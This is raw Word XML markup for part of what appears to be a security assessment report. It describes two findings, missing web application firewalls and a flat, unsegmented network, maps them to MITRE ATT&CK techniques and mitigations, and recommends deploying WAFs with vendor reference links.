              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:u w:val="none"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>N/A</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="67CBB36A">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AE4D79" w14:textId="61D1A2F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B3A6B93" w14:textId="210CA669">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B2C8FF7" w14:textId="00EEA4DD">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="Rf3dc05eaceac40f1">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>T1190: Exploit Public-Facing Application</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="03888103">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13FA5A23"/>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7813E1" w14:textId="3A59AF62">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D2BE985" w14:textId="12FC37C0">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="R100b1c5df41a4688">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:caps w:val="0"/>
                  <w:smallCaps w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>M1037: Filter Network Traffic</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="02E7DC2E" w14:textId="5C821E3E">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="Ree9c5467a95e497c">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:caps w:val="0"/>
                  <w:smallCaps w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>M1050: Exploit Protection</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="4281E64E">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C0E8CF" w14:textId="63191E72">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DE20C0D" w14:textId="62B9C043">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38EC4A98" w14:textId="4D8D7E9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B1E6FB9" w:rsidP="0D325B6E" w:rsidRDefault="3B1E6FB9" w14:paraId="60512541" w14:textId="604105F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B1E6FB9" w:rsidP="0D325B6E" w:rsidRDefault="3B1E6FB9" w14:paraId="1C7A69EA" w14:textId="476766BF">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Web servers on APT’s network lack any form of web application firewalls</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7CB26F09">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (WAFs)</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websites from attacks. The absence of a web application </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increases the chances that a vulnerable web application will be exploited by a threat actor using common website exploitation techniques.</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 xml:space="preserve"> Implementing </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 xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1E44DF49">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WAF</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1E44DF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preemptively</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007635C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">stops </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="33FEAEAB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>man</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="33FEAEAB">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33FEAEA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othe</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1591C8CA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>r web application exploits.</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5C49624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3B33DC1C" w14:textId="2951DD1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B1E6FB9" w:rsidP="0D325B6E" w:rsidRDefault="3B1E6FB9" w14:paraId="229BF651" w14:textId="6E146D1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B1E6FB9" w:rsidP="0D325B6E" w:rsidRDefault="3B1E6FB9" w14:paraId="605220F9" w14:textId="6904EA9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The lack of </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web</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="12F2CFE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2F2CFE2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>appl</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="12F2CFE2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>icati</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="12F2CFE2">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2F2CFE2">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protection leaves APT open to attacks on </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5B3D04D6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>web apps</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leading to a loss of sensitive customer data and potentially </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cru</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ise</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di</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srupting operations. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="5183A228" w14:textId="408AF370">
      <w:p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B1E6FB9" w:rsidP="0D325B6E" w:rsidRDefault="3B1E6FB9" w14:paraId="7C53C5BC" w14:textId="3168773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B1E6FB9" w:rsidP="0D325B6E" w:rsidRDefault="3B1E6FB9" w14:paraId="2303BD28" w14:textId="1906042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N/A</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="7963CA67" w14:textId="0D6F6C4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B1E6FB9" w:rsidP="0D325B6E" w:rsidRDefault="3B1E6FB9" w14:paraId="0D6D6F8F" w14:textId="0BB386C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B1E6FB9" w:rsidP="0D325B6E" w:rsidRDefault="3B1E6FB9" w14:paraId="4A773A8A" w14:textId="1F80992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B1E6FB9" w:rsidP="0D325B6E" w:rsidRDefault="3B1E6FB9" w14:paraId="1CF34524" w14:textId="0E756FEE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="120"/>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Deploy </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="132D1236">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eb </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="3D860071">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 xml:space="preserve">pplication </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="697B1604">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3B1E6FB9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>irewalls on all servers that currently host websites, prioritizing those that are publicly accessible.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="187326E8" w14:textId="2C40F9AC">
      <w:pPr>
        <w:pStyle w:val="Normal"/>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3B1E6FB9" w:rsidP="0D325B6E" w:rsidRDefault="3B1E6FB9" w14:paraId="79498001" w14:textId="5AC2894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1E6FB9">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3B1E6FB9" w:rsidP="0D325B6E" w:rsidRDefault="3B1E6FB9" w14:paraId="1DE33D88" w14:textId="162146C3">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ea579dae359b47a0">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="3B1E6FB9">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:caps w:val="0"/>
            <w:smallCaps w:val="0"/>
            <w:strike w:val="0"/>
            <w:dstrike w:val="0"/>
            <w:noProof w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Palo Alto Networks</w:t>
        </w:r>
        <w:r w:rsidRPr="0D325B6E" w:rsidR="3D30F567">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:caps w:val="0"/>
            <w:smallCaps w:val="0"/>
            <w:strike w:val="0"/>
            <w:dstrike w:val="0"/>
            <w:noProof w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t xml:space="preserve"> -</w:t>
        </w:r>
        <w:r w:rsidRPr="0D325B6E" w:rsidR="3B1E6FB9">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:caps w:val="0"/>
            <w:smallCaps w:val="0"/>
            <w:strike w:val="0"/>
            <w:dstrike w:val="0"/>
            <w:noProof w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t xml:space="preserve"> How to Deploy Web Application Firewalls</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="3B1E6FB9" w:rsidP="0D325B6E" w:rsidRDefault="3B1E6FB9" w14:paraId="47AFEFFA" w14:textId="44FEC42C">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73dce517a5b74abe">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="3B1E6FB9">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:caps w:val="0"/>
            <w:smallCaps w:val="0"/>
            <w:strike w:val="0"/>
            <w:dstrike w:val="0"/>
            <w:noProof w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Oracle - Web Application Firewall Policies</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="6B2528A8" w14:textId="41D7BE34">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="7A2366C6" w14:textId="51BFA054">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D491E33" w:rsidP="0D325B6E" w:rsidRDefault="0D491E33" w14:paraId="0904D4D9" w14:textId="29B832E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0D491E33">
        <w:rPr>
          <w:rFonts w:ascii="Aptos Display" w:hAnsi="Aptos Display" w:eastAsia="Aptos Display" w:cs="Aptos Display"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>▌</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0D491E33">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H1: Lack of Network Segmentation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5"/>
        <w:gridCol w:w="1575"/>
        <w:gridCol w:w="2475"/>
        <w:gridCol w:w="4350"/>
      </w:tblGrid>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="0BA3F99E">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2C71E2" w14:textId="269A108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4C67262" w14:textId="268D3B3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082458" w14:textId="401290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B3A4E16">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8232498" w14:textId="18980E5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48036D2" w14:textId="46FA043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7A7B93C" w14:textId="79E96073">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8E3B345" w14:textId="0FDCEC5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6848A8F1">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>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436AB4D" w14:textId="43BF4EA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EF3E8CA" w14:textId="5370F6A8">
            <w:pPr>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04B5E40C"/>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99D4FA1"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="7FB2A019">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E211F7D" w14:textId="7B79FD3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C98058C" w14:textId="13043111">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:u w:val="none"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>N/A</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="7C3A5DD7">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="15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E7283F0" w14:textId="60DC3B2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411515" w14:textId="690EFB5A">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917628E" w14:textId="37F7D4A1">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="R7a978b74634a4a91">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>T1210: Exploitation of Remote Services</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="3B97D370">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1575" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:sz="0"/>
              <w:left w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
              <w:bottom w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
              <w:right w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
            </w:tcBorders>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0A6F2823"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="15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3F92A0" w14:textId="68FA5804">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101BAE0" w14:textId="295BBCD3">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="R9638a6a2b9424a46">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:caps w:val="0"/>
                  <w:smallCaps w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>M1030: Network Segmentation</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="62DD794B">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="315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A53751" w14:textId="530F7078">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3C39BF3" w14:textId="3613963B">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726F34D3" w14:textId="40B9974F">
      <w:p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D491E33" w:rsidP="0D325B6E" w:rsidRDefault="0D491E33" w14:paraId="557C6F72" w14:textId="0834A52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D491E33" w:rsidP="0D325B6E" w:rsidRDefault="0D491E33" w14:paraId="247E350D" w14:textId="5868DC5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Multiple hosts are reachable across a flat network without any zone-based controls separating them. A successful compromise of a single host grants attackers the ability to pivot into </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="266DAE13">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">all </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adjacent systems in APT’s network. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="59BED9AB" w14:textId="0B086C4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491E33" w:rsidP="0D325B6E" w:rsidRDefault="0D491E33" w14:paraId="03162D58" w14:textId="1E31B86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D491E33" w:rsidP="0D325B6E" w:rsidRDefault="0D491E33" w14:paraId="2E1A105D" w14:textId="27E5664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If an attack</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er ca</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n </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7530F6C3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">compromise a single host on the internal network, they then have the ability to </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7530F6C3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>pivot to</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7530F6C3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> all other systems on the network.</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7530F6C3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> This can allow an attacker to perform a full network takedown, causing massive </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7530F6C3">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inancial</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pe</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73AC893F">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 xml:space="preserve">and </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rep</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utati</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40F0CD63">
        <w:rPr>
